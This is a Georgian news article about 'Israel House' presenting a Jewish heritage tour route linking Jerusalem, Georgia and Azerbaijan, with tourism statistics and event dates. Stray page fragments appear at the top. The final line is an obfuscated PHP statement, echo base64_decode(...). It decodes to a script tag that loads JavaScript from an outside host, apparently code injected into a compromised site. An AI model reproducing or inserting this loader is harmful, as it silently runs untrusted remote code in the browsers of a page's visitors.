celsiusi
ავერსი შნაიდერი
ხვალ, 25 სექტემბერს, ებრაულ ახალ წელს, „ისრაელის სახლი“ ფართო საზოგადოებას ებრაული კულტურული მემკვიდრეობის ბიბლიურ მარშრუტს წარუდგენს. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIMS-ს „ისრაელის სახლიდან“ აცნობეს. 
 
მათივე ცნობით, პრეზენტაცია გაიმართება 25 სექტემბერს, 13 საათზე, სასტუმროში The Biltmore Hotel Tbilisi (მის: შოთა რუსთაველის გამზ. N29). 
 
"სტუმრებს შორის იქნებიან საქართველოს პარლამენტისა და ტურიზმის ადმინისტრაციის წარმომადგენლები, ისრაელელი ბიზნესმენები, ტურისტული კომპანიები, სტუდენტები, ლექტორები, ებრაული ორგანიზაციები, მედია და სხვა.
 
მარშრუტი შეთანხმებულია ევროსაბჭოს ეგიდით მოქმედი ებრაული კულტურისა და მემკვიდრეობის დაცვისა და ხელშეწყობის ევროპულ ასოციაციასთან (AEPJ), მარშრუტის ძირითადი, კავკასიის მიმართულება  კი ევროკავშირის პროგრამის ნაწილია. 
 
ახალი მარშრუტის მიზანია ებრაული მემკვიდრეობის მარშრუტი საინტერესო და მიმზიდველი გახდეს მსოფლიოსთვის და AEPJ-ის სახელით წარმოდგენილი იქნეს მსოფლიო ტურისტულ გამოფენებზე. 
 
„ისრაელის სახლი“ AEPJ-ის  წევრი ორგანიზაციაა და კულტურის სამინისტროს წარდგინებით, საქართველოში ოფიციალურად კურირებს ევროსაბჭოს მიერ სერტიფიცირებულ ებრაული კულტურული მემკვიდრეობის ევროპულ მარშრუტს.
 
დაგეგმილია გიდების მომზადება, რომლებიც ვიზიტორებს ისტორიულ ჭრილში დაწვრილებით მოუყვებიან პირველი და მეორე ტაძრის ეპოქებიდან სამხრეთ კავკასიაში, კერძოდ კი, საქართველოსა და აზერბაიჯანში ებრაელთა შემოსვლის, განსახლების, მიგრაციების, ყოფის და ბოლოს, სამშობლოში დაბრუნების შესახებ. მარშრუტი დაიწყება იერუსალიმიდან, გაგრძელდება მცხეთაში, მოიცავს თბილისს,  შემდეგ აზერბაიჯანს (ბაქო, კუბა), შემდეგ ისევ საქართველოს - ონს, ლაილაშს, თბილისის და ბოლოს იერუსალიმს. ისტორიული ექსკურსი მოიცავს თითქმის 3-ათასწლიან პერიოდს ბიბლიური მეფე დავითის მმართველობიდან, ებრაელთა სამშობლოდან იძულებითი დევნილობის ხანასა და ალიას.  ამიტომ „ისრაელის სახლის“ მიერ შემუშავებულ ახალ მარშრუტს პირობითად, შეიძლება, ეწოდოს „იერუსალიმიდან იერუსალიმამდე“. 
 
ბიბლიური მარშრუტი პოპულარიზაციის მიზნით, „ისრაელის სახლი“ მსოფლიო ტურიზმის ორგანიზაციასაც მიმართავს.
 
"მნიშვნელოვანია, რომ ევროსაბჭოს მიერ სერტიფიცირებული ებრაული კულტურული მემკვიდრეობის ევროპული მარშრუტი უკვე იქცა ტურიზმის განუყოფელ ნაწილად. ახლა „ისრაელის სახლი“, მანამდე კი მისი პარტნიორი ორგანიზაცია - საქართველო-ისრაელის ბიზნესპალატა“, გასული საუკუნის 90-იანი წლებიდან მუშაობენ საქართველოში ისრაელსა და მსოფლიო ებრაელობიდან ტურისტების მოზიდვაზე. ამ მიზნით, 1999 წელს ბიზნესპალატის ხელმძღვანელმა იციკ მოშემ, საქართველოს ტურიზმის დეპარტამენტთან და ისრაელის ტურიზმის სამინისტროსთან შეთანხმებით, ისრაელში გახსნა საქართველოს ტურიზმის წარმომადგენლობა, რომელმაც მნიშვნელოვანი როლი შეასრულა ისრაელიდან ტურისტთა მოზიდვაში. 
 
წინასწარი მონაცემებით, წელს ისრაელიდან ვიზიტორთა რიცხვი, სავარაუდოდ, 200 ათასს მიაღწევს, რაც პანდემიამდელ პიკს - 2019 წლის მონაცემებს აღემატება. როგორც იციკ მოშე ვარაუდობს, ერთობლივი ძალისხმევით, შესაძლებელია, საქართველოში კულტურული ტურიზმის გაძლიერება, შესაბამისად, რამდენიმე წელიწადში ისრაელიდან ვიზიტორთა რაოდენობის 400 ათასამდე გაზრდა. ამ საკითხზე ის უკვე ესაუბრა საქართველოს ტურიზმის ადმინისტრაციის ხელმძღვანელობას.
 
მ.წ. 7 ნოემბერს დაგეგმილია ბიბლიური მარშრუტის პრეზენტაცია იერუსალიმში, ხოლო 18 დეკემბერს, ხანუქას, ისრაელის კვირეულის ფარგლებში, მარშრუტს პირველი მონაწილეები  გაივლიან. გაისად კი დაგეგმიალია მარშრუტის ევროპის ქვეყნებში  წარდგენა.
„ისრაელის სახლის“ ხელმძღვანელის, იციკ მოშე შეფასებით,  საერთაშორისო ორგანიზაციის ეგიდით მოქმედი ებრაული კულტურული მემკვიდრეობის მარშრუტი კიდევ ერთი ქმედითი ინსტრუმენტია საქართველო, ისრაელი და მსოფლიო ებრაელობიის ურთიერთობების გაღრმავების საქმეში, რასაც წლებია ემსახურებიან საქართველო-ისრაელის ბიზნესპალატა და „ისრაელის სახლი“,– განმარტავენ „ისრაელის სახლიში“.
344
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");